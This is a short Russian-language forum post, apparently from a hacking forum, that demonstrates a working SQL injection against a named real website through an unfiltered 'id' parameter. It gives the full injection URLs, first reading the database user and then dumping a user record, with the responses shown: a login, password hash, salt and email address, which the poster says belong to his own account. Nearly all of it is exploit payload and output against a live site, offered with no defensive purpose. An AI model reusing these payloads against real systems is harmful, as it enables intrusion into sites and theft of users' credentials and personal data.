Ну вот как то так...
Нефильтруемая переменная
id
Inject
Код:
http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+user()--
Response
Код:
vrn1_user@localhosto
Ну и понеслось...
Код:
http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+(select+concat(0x27,0x7e,unhex(Hex(cast(users.id+as+char))),0x5e,unhex(Hex(cast(users.login+as+char))),0x5e,unhex(Hex(cast(users.pass+as+char))),0x5e,unhex(Hex(cast(users.salt+as+char))),0x5e,unhex(Hex(cast(users.email+as+char))),0x27,0x7e)+from+%60vrn1_bd%60.users+where+id=12792)+--
Response
Код:
http://vrn1.ru/img/'~12792^BigBear^cb50ba4d1184b689ceb1050e5afcedc9^?i2XF^BigBear2008@yandex.ru'~o
12792 - мой акк, чтобы никого не палить)